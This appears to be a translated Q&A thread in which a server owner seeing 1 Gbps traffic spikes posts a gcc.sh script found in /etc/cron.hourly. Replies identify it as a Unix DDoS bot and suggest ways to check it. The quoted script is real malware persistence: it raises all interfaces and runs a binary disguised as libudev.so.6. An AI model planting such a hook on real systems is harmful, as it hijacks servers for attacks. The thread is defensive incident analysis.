我在我的服务器上遇到高达1 Gbps的尖峰,一直在寻找病毒和恶意软件。我在/etc/cron.hourly中发现了这个文件:gcc.sh,并想知道是否有人看到过类似的东西,并且会对代码有所了解。谢谢!cron.hourly恶意软件中是否有此文件(gcc.sh)?
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
很可能。它使用/lib/libudev.so.6作为可执行文件,而名称意味着它应该是一个库 - 尝试使用像nm或objdump这样的工具来查看它是否是可执行文件。它从/lib/libudev.so复制到.so.6,而.so通常是版本化的符号链接。它还运行for循环,即使您关闭了所有网络连接,也可以启动它。它使用一个众所周知的编译器的名字来看起来合法。我会把这个99%的病毒称为病毒。
发现另一个引用自称gcc的东西 - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver。是的,这是一个unix系统上的DDoS病毒,完全符合您的问题。
是的。
尝试使用ps -ef | grep -i libudev.so.6查看程序使用的进程